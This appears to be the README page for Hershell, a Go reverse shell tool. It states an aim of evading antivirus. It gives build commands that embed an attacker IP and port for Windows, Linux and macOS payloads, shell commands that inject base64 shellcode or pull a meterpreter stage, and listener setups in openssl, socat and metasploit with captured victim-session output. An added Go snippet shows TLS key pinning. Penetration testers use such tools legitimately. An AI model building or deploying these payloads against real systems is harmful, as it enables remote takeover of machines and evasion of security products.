Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go ^(https://golang.org/). It uses TLS to secure the communications, and provides a certificate public key fingerprint pinning feature, preventing traffic interception.
Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives
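The fingerprint pinning described above, shown as an added Go example that is not Hershell's own code: the client pins the SHA-256 digest of the listener's SubjectPublicKeyInfo inside a tls.Config, so a peer presenting any other key fails the handshake. SPKIFingerprint, PinnedConfig and SelfSignedCert are illustrative names; the listener certificate being self-signed (hence InsecureSkipVerify with the pin as the only check) is an assumption, and the test certificate is constructed inside the block.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"errors"
	"math/big"
	"time"
)

// SPKIFingerprint hashes the DER SubjectPublicKeyInfo: the pin covers the
// listener's key, not the whole certificate, so renewal with the same key holds.
func SPKIFingerprint(der []byte) ([32]byte, error) {
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return [32]byte{}, err
	}
	return sha256.Sum256(cert.RawSubjectPublicKeyInfo), nil
}

// PinnedConfig skips CA validation (the listener cert is assumed self-signed)
// and aborts the handshake unless a presented key matches the pin, so an
// interceptor that substitutes its own certificate never gets a session.
func PinnedConfig(pin [32]byte) *tls.Config {
	return &tls.Config{InsecureSkipVerify: true,
		VerifyPeerCertificate: func(raw [][]byte, _ [][]*x509.Certificate) error {
			for _, der := range raw {
				if fp, err := SPKIFingerprint(der); err == nil && fp == pin {
					return nil
				}
			}
			return errors.New("tls: peer key does not match pinned fingerprint")
		}}
}

// SelfSignedCert returns a constructed throwaway DER cert standing in for server.pem.
func SelfSignedCert() ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1),
		NotBefore: time.Now(), NotAfter: time.Now().Add(time.Hour)}
	return x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
}
```

Because the pin replaces CA validation, an inspecting TLS proxy cannot terminate this connection; on the wire such sessions stand out as TLS to a self-signed certificate that no enterprise CA issued, which is the property a network defender can alert on.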

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell, which can work on multiple systems.

How ?
Since it is written in Go, you can cross compile the source for the desired architecture.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:

  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port

For the GOOS and GOARCH variables, you can get the allowed values here ^(https://golang.org/doc/install/source#environment).
However, some helper targets are available in the Makefile:

  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos : builds a mac os 64 bits executable (Mach-O)

For those targets, you only need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:

  • run_shell : drops you a system shell (allowing you, for example, to change directories)
  • inject : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)
  • meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and executes the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Examples
First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

For windows:

# Custom target
$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predefined target
$ make windows32 LHOST=192.168.0.12 LPORT=1234

For Linux:

# Custom target
$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predefined target
$ make linux32 LHOST=192.168.0.12 LPORT=1234

For Mac OS X:

$ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server side, you can use the openssl built-in TLS server:

$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
bad gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kE
MHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI
5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>

Or even better, use socat with its readline module, which gives you a handy history feature:

$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>

Or, and that's great, use a metasploit handler:

[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
lhost => 192.168.122.1
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
handlersslcert => /tmp/data/server.pem
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.122.1:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Starting the payload handler...
[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2018-02-09 12:07:51 +0000
[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [version 10.0.10586]
(c) 2018 Microsoft Corporation. Tous droits réservés.

C:\Users\lab1\Downloads>whoami
whoami
desktop-jcfs2ok\lab1

C:\Users\lab1\Downloads>

Credits
Ronan Kervella

Download Hershell ^(https://github.com/sysdream/hershell)